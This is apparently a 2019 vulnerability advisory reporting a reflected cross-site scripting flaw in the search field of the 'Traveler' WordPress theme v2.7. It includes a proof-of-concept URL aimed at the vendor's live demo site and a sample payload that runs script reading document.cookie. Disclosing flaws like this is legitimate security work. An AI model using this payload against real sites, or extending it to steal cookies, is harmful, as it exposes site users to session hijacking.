Below is a copy: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-28
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7
[?] :: Technical Details & Description:
# Weak security measures like no input fields data filtering has been discovered in the Traveler - Travel Booking WordPress Theme. Current version of this WordPress premium theme is 2.7.
[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend: https://remap.travelerwp.com/
[!] :: Special Note:
# 5.822 Sales
[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection use default WordPress search on the demo website https://remap.travelerwp.com/?s=[payload]
# Sample payload: "><img src=x onerror=alert(document.cookie)>
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum